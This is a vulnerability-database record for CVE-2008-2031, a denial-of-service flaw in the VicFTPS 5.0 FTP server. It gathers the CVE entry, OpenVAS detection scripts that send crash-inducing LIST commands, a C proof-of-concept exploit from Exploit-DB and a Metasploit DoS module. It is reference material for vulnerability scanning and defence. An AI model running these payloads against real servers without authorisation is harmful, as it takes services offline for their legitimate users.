{"id": "OPENVAS:103091", "type": "openvas", "bulletinFamily": "scanner", "title": "VicFTPS 'LIST' Command Remote Denial of Service Vulnerability", "description": "VicFTPS is prone to a remote denial-of-service vulnerability because\nit fails to handle specially crafted input.\n\nSuccessfully exploiting this issue will allow an attacker to crash the\naffected application, denying further service to legitimate users.\nArbitrary code execution may also be possible; this has not been\nconfirmed.\n\nVicFTPS 5.0 is vulnerable; other versions may also be affected.", "published": "2011-02-25T00:00:00", "modified": "2017-09-01T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=103091", "reporter": "This script is Copyright (C) 2011 Greenbone Networks GmbH", "references": ["https://www.securityfocus.com/bid/46546", "http://vicftps.50webs.com/"], "cvelist": ["CVE-2008-2031"], "lastseen": "2017-09-04T14:20:15", "viewCount": 1, "enchantments": {"score": {"value": 8.0, "vector": "NONE", "modified": "2017-09-04T14:20:15", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2031"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900580", "OPENVAS:1361412562310103091", "OPENVAS:900580"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/WINDOWS/FTP/VICFTPS50_LIST"]}, {"type": "exploitdb", "idList": ["EDB-ID:6834"]}], "modified": "2017-09-04T14:20:15", "rev": 2}, "vulnersScore": 8.0}, "pluginID": "103091", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vicftps_46546.nasl 7044 2017-09-01 11:50:59Z teissa $\n#\n# VicFTPS 'LIST' Command Remote Denial of Service Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"VicFTPS is prone to a remote denial-of-service vulnerability because\nit fails to handle specially crafted input.\n\nSuccessfully exploiting this issue will allow an attacker to crash the\naffected application, denying further service to legitimate users.\nArbitrary code execution may also be possible; this has not been\nconfirmed.\n\nVicFTPS 5.0 is vulnerable; other versions may also be affected.\";\n\n\nif (description)\n{\n script_id(103091);\n script_version(\"$Revision: 7044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-01 13:50:59 +0200 (Fri, 01 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-25 13:54:37 +0100 (Fri, 25 Feb 2011)\");\n script_bugtraq_id(46546);\n script_cve_id(\"CVE-2008-2031\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_name(\"VicFTPS 'LIST' Command Remote Denial of Service Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"https://www.securityfocus.com/bid/46546\");\n script_xref(name : \"URL\" , value : \"http://vicftps.50webs.com/\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_DENIAL);\n script_family(\"FTP\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\",\"secpod_ftp_anonymous.nasl\",\"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\n\nftpPort = get_kb_item(\"Services/ftp\");\nif(!ftpPort){\n ftpPort = 21;\n}\n\nif(get_kb_item('ftp/'+ftpPort+'/broken'))exit(0);\n\nif(!get_port_state(ftpPort)){\n exit(0);\n}\n\nbanner = get_ftp_banner(port:ftpPort);\nif(!banner || \"VicFTPS\" >!< banner)exit(0);\n\nsoc1 = open_sock_tcp(ftpPort);\nif(!soc1){\n exit(0);\n}\n\nclose(soc1);\n\ndomain = get_kb_item(\"Settings/third_party_domain\");\nif(isnull(domain)) {\n domain = this_host_name();;\n} \n\nuser = get_kb_item(\"ftp/login\");\npass = get_kb_item(\"ftp/password\");\n\nif(!user)user = \"anonymous\";\nif(!pass)pass = string(\"openvas@\", domain);;\n\nfor(i=0;i<5;i++) {\n\n soc1 = open_sock_tcp(ftpPort);\n login_details = ftp_log_in(socket:soc1, user:user, pass:pass);\n\n if(login_details) {\n\n buf = string(\"LIST \",crap(data:\"../A\",length:100),\"\\r\\n\");\n send(socket:soc1, data:buf);\n close(soc1);\n sleep(1);\n\n }\n}\n\nsleep(5);\nsoc = open_sock_tcp(ftpPort);\n\nif(!soc) {\n security_message(port:ftpPort);\n exit(0);\n} else {\n close(soc);\n} \n\nexit(0); \n\n \n", "naslFamily": "FTP"}

{"cve": [{"lastseen": "2020-10-03T11:50:59", "description": "VicFTPS 5.0 allows remote attackers to cause a denial of service (crash) via a crafted LIST command, which triggers a NULL pointer dereference. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.", "edition": 3, "cvss3": {}, "published": "2008-04-30T16:17:00", "title": "CVE-2008-2031", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2031"], "modified": "2017-08-08T01:30:00", "cpe": ["cpe:/a:vicftps:vicftps:5.0"], "id": "CVE-2008-2031", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2031", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:vicftps:vicftps:5.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-03-26T19:10:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2031"], "description": "VicFTPS is prone to a remote denial-of-service vulnerability because\n it fails to handle specially crafted input.", "modified": "2020-03-24T00:00:00", "published": "2011-02-25T00:00:00", "id": "OPENVAS:1361412562310103091", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103091", "type": "openvas", "title": "VicFTPS 'LIST' Command Remote Denial of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VicFTPS 'LIST' Command Remote Denial of Service Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103091\");\n script_version(\"2020-03-24T12:27:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 12:27:11 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-02-25 13:54:37 +0100 (Fri, 25 Feb 2011)\");\n script_bugtraq_id(46546);\n script_cve_id(\"CVE-2008-2031\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_name(\"VicFTPS 'LIST' Command Remote Denial of Service Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://www.securityfocus.com/bid/46546\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_DENIAL);\n script_family(\"FTP\");\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"ftp/vicftps/detected\");\n\n script_tag(name:\"summary\", value:\"VicFTPS is prone to a remote denial-of-service vulnerability because\n it fails to handle specially crafted input.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue will allow an attacker to crash the\n affected application, denying further service to legitimate users. Arbitrary code execution may also be possible.\n This has not been confirmed.\");\n\n script_tag(name:\"affected\", value:\"VicFTPS 5.0 is vulnerable. Other versions may also be affected.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of\n this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release,\n disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"misc_func.inc\");\n\nftpPort = ftp_get_port(default:21);\nbanner = ftp_get_banner(port:ftpPort);\nif(!banner || \"VicFTPS\" >!< banner)\n exit(0);\n\nsoc = open_sock_tcp(ftpPort);\nif(!soc){\n exit(0);\n}\n\nbanner = ftp_recv_line(socket:soc);\nftp_close(socket:soc);\nif(!banner || \"VicFTPS\" >!< banner){\n exit(0);\n}\n\nkb_creds = ftp_get_kb_creds();\nuser = kb_creds[\"login\"];\npass = kb_creds[\"pass\"];\n\nfor(i = 0; i < 5; i++ ) {\n soc1 = open_sock_tcp(ftpPort);\n login_details = ftp_log_in(socket:soc1, user:user, pass:pass);\n if(login_details) {\n buf = string(\"LIST \",crap(data:\"../A\",length:100),\"\\r\\n\");\n send(socket:soc1, data:buf);\n close(soc1);\n sleep(1);\n }\n}\n\nsleep(5);\nsoc = open_sock_tcp(ftpPort);\n\nif(!soc) {\n security_message(port:ftpPort);\n exit(0);\n} else {\n close(soc);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-02T21:14:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2031", "CVE-2008-6829"], "description": "This host is running VicFTPS FTP Server which is prone to\nDenial of Service Vulnerability.", "modified": "2017-01-31T00:00:00", "published": "2009-06-26T00:00:00", "id": "OPENVAS:900580", "href": "http://plugins.openvas.org/nasl.php?oid=900580", "type": "openvas", "title": "VicFTPS LIST Command Denial of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_vicftps_list_dos_vuln.nasl 5148 2017-01-31 13:16:55Z teissa $\n#\n# VicFTPS LIST Command Denial of Service Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation allows attackers to execute arbitrary\ncode, and can crash the affected application.\n\nImpact Level: Application\";\n\ntag_affected = \"VicFTPS Version 5.0 and prior on Windows.\";\n\ntag_insight = \"A NULL pointer dereference error exists while processing\nmalformed arguments passed to a LIST command that starts with a '/\\/' (forward\nslash, backward slash, forward slash).\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"This host is running VicFTPS FTP Server which is prone to\nDenial of Service Vulnerability.\";\n\nif(description)\n{\n script_id(900580);\n script_version(\"$Revision: 5148 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-31 14:16:55 +0100 (Tue, 31 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-26 07:55:21 +0200 (Fri, 26 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2008-6829\", \"CVE-2008-2031\");\n script_bugtraq_id(28967);\n script_name(\"VicFTPS LIST Command Denial of Service Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://milw0rm.com/exploits/6834\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/29943\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"find_service.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"ftp_func.inc\");\ninclude(\"version_func.inc\");\n\nvicPort = get_kb_item(\"Services/ftp\");\nif(!vicPort){\n vicPort = 21;\n}\n\nif(!get_port_state(vicPort)){\n exit(0);\n}\n\nif(safe_checks() || \"VicFTPS\" >!< get_ftp_banner(port:vicPort)){\n exit(0);\n}\n\nsoc = open_sock_tcp(vicPort);\nif(!soc){\n exit(0);\n}\n\n# Authenticate with anonymous user (Before crash)\nif(!ftp_authenticate(socket:soc, user:\"anonymous\", pass:\"anonymous\")){\n exit(0);\n}\n\nfor(i = 0; i < 3; i++)\n{\n cmd = \"LIST /\\/\";\n ftp_send_cmd(socket:soc, cmd:cmd);\n sleep(5);\n ftp_close(soc);\n\n # Check for VicFTPS Service Status\n soc = open_sock_tcp(vicPort);\n if(!soc)\n {\n security_message(vicPort);\n exit(0);\n }\n else\n {\n if(!ftp_authenticate(socket:soc, user:\"anonymous\", pass:\"anonymous\"))\n {\n security_message(vicPort);\n ftp_close(soc);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-03-26T19:11:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2031", "CVE-2008-6829"], "description": "This host is running VicFTPS FTP Server which is prone to\n Denial of Service Vulnerability.", "modified": "2020-03-24T00:00:00", "published": "2009-06-26T00:00:00", "id": "OPENVAS:1361412562310900580", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900580", "type": "openvas", "title": "VicFTPS LIST Command Denial of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VicFTPS LIST Command Denial of Service Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900580\");\n script_version(\"2020-03-24T12:27:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 12:27:11 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-06-26 07:55:21 +0200 (Fri, 26 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2008-6829\", \"CVE-2008-2031\");\n script_bugtraq_id(28967);\n script_name(\"VicFTPS LIST Command Denial of Service Vulnerability\");\n script_xref(name:\"URL\", value:\"http://milw0rm.com/exploits/6834\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/29943\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"ftp/vicftps/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to execute arbitrary\n code, and can crash the affected application.\");\n\n script_tag(name:\"affected\", value:\"VicFTPS Version 5.0 and prior on Windows.\");\n\n script_tag(name:\"insight\", value:\"A NULL pointer dereference error exists while processing\n malformed arguments passed to a LIST command that starts with a '/\\/' (forward\n slash, backward slash, forward slash).\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"This host is running VicFTPS FTP Server which is prone to\n Denial of Service Vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"misc_func.inc\");\n\nvicPort = ftp_get_port(default:21);\nbanner = ftp_get_banner(port:vicPort);\nif(!banner || \"VicFTPS\" >!< banner)\n exit(0);\n\nsoc = open_sock_tcp(vicPort);\nif(!soc)\n exit(0);\n\nif(!ftp_authenticate(socket:soc, user:\"anonymous\", pass:\"anonymous\"))\n exit(0);\n\nfor(i = 0; i < 3; i++)\n{\n cmd = \"LIST /\\/\";\n ftp_send_cmd(socket:soc, cmd:cmd);\n sleep(5);\n ftp_close(soc);\n\n soc = open_sock_tcp(vicPort);\n if(!soc) {\n security_message(port:vicPort);\n exit(0);\n } else {\n if(!ftp_authenticate(socket:soc, user:\"anonymous\", pass:\"anonymous\")) {\n security_message(port:vicPort);\n exit(0);\n }\n ftp_close(soc);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T01:46:13", "description": "vicFTP 5.0 (LIST) Remote Denial of Service Exploit. CVE-2008-2031,CVE-2008-6829. Dos exploit for windows platform", "published": "2008-10-24T00:00:00", "type": "exploitdb", "title": "vicFTP 5.0 LIST Remote Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2031", "CVE-2008-6829"], "modified": "2008-10-24T00:00:00", "id": "EDB-ID:6834", "href": "https://www.exploit-db.com/exploits/6834/", "sourceData": "#include <cstdio>\n#include <winsock2.h>\n#include <memory.h>\n#define __z00ro(a) memset(a,0,sizeof(a));\n\n//greetings : SiD.psycho \n//Smallest greetings : Gorion - lofamy cIem We want be like y0U :***\n\nunsigned int setport(const char* port){\n if((atoi(port)==0) || (atoi(port)<0)){\n return 21;\n }\n return atoi(port); \n} \n\nint main(int argc,char **argv){\n\nprintf(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\"\n \"+=========== vicFTPS v 5.0 REMOTE dos POC ;[ ===========+\\n\"\n \"+=========== Alfons Luja sp Z.0.0 ===========+\\n\"\n \"+=========== I want clear b00f not a d0s !!! ===========+\\n\"\n \"+=========== Propably 0 dAy ===========+\\n\"\n \"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\");\nif(argc<3){\n printf(\"\\nuse poc.exe IP PORT\\n\");\n return 0;\n}\nint socks;\nhostent *host;\nWSADATA WSA;\nSOCKADDR_IN aip;\nchar recvs[666]={0}; //ave\nchar test[66]={0}; // 4 nothing\nconst char *login = \"USER Anonymous\\r\\n\"; \nconst char *pass = \"PASS echo@gov.tr\\r\\n\";\nstrcpy(test,\"LIST /\\\\/iWana_be_like_Gorion\\\\\");\nmemset(test+strlen(\"LIST /\\\\/iWana_be_like_Gorion\\\\\"),0x42,sizeof(test));\ntest[sizeof(test)-2]='\\r';\ntest[sizeof(test)-1]='\\n';\ntest[sizeof(test)]='\\0';\nprintf(\"\\nTarget:%s\\nPort:%u\\n\",argv[1],setport(argv[2]));\nif((WSAStartup(MAKEWORD(4, 2), &WSA))==0){\n if((socks = socket(AF_INET,SOCK_STREAM,0)) != -1){\n aip.sin_family = AF_INET;\n aip.sin_addr.s_addr = inet_addr(argv[1]);\n aip.sin_port = htons(setport(argv[2]));\n memset(&(aip.sin_zero),'0',8);\n if(connect(socks,(struct sockaddr*)&aip,sizeof(struct sockaddr)) == 0){\n recv(socks,recvs,sizeof(recvs)-1,0);\n __z00ro(recvs);\n send(socks,login,strlen(login),0);\n recv(socks,recvs,sizeof(recvs)-1,0);\n __z00ro(recvs);\n send(socks,pass,strlen(pass),0);\n recv(socks,recvs,sizeof(recvs)-1,0); \n printf(\"%s\",recvs);\n if(!strncmp(recvs,\"230 fake user logged in.\",3)){\n printf(\"Send greeting!!\\n\"); \n __z00ro(recvs);\n send(socks,test,sizeof(test),0); \n recv(socks,recvs,sizeof(recvs)-1,0); \n Sleep(200); \n printf(\"Server is charmed and died happy!!\\n\"); \n }\n else{\n printf(\"Target dont love us . You must have account :[\\r\\n\");\n closesocket(socks); \n WSACleanup();\n return 0; \n } \n }\n else {\n printf(\"(__eRROR):[Connection error](!!!!)\\n\"\n \"It can be bad port number or IP addresss!\\n\");\n closesocket(socks); \n WSACleanup();\n return 0; \n } \n }\n WSACleanup();\n } \nreturn 0; \n}\n\n\n//~~@KND http://pl.youtube.com/watch?v=KvFAx3ArmlE ~@~\n\n// milw0rm.com [2008-10-24]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6834/"}], "metasploit": [{"lastseen": "2020-02-11T20:46:55", "description": "The Victory FTP Server v5.0 can be brought down by sending a very simple LIST command\n", "published": "2009-01-09T05:33:26", "type": "metasploit", "title": "Victory FTP Server 5.0 LIST DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2031", "CVE-2008-6829"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/VICFTPS50_LIST", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Victory FTP Server 5.0 LIST DoS',\n 'Description' => %q{\n The Victory FTP Server v5.0 can be brought down by sending\n a very simple LIST command\n },\n 'Author' => 'kris katterjohn',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2008-2031' ],\n [ 'CVE', '2008-6829' ],\n [ 'OSVDB', '44608' ],\n [ 'EDB', '6834' ]\n ],\n 'DisclosureDate' => 'Oct 24 2008'))\n\n # They're required\n register_options([\n OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),\n OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])\n ])\n end\n\n def run\n return unless connect_login\n\n print_status(\"Sending command...\")\n\n # Try to wait for a response\n resp = send_cmd(['LIST', [0x2f, 0x5c].pack('CC')])\n\n disconnect\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/vicftps50_list.rb"}]}